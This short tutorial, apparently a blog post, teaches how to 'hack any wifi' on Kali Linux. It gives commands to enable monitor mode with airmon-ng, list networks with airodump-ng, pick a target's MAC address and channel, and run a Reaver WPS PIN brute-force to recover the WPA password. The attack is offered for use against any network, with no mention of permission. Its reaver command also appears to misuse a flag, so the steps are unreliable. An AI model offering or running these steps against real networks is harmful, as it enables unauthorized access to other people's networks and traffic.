How To Hack Any Wifi Using Reaver Attack on Kali Linux !
Today I will teach to you that how you can hack any wifi on Kali Linux :-
Video :-
- First of all you have to start the Kali Linux .
- Now open the terminal .
- Then Type with out brackets ( airmon-ng start wlan0 ).
- Now after this command you have to enable mon mode in Kali Linux .
- So now type ( airodump-ng mon0 )
- Now you will see the list of Wifi Networks .
- Now copy the Mac Address and channels of wifi which you want to hack .
- Then type this command ( reaver -i mon0 -m macaddress -c channel -vv )
- In above command put you wifi mac address instead of macaddress and number of channels instead of the channel .
- That's all after some time it will show the WPA pin and Password !
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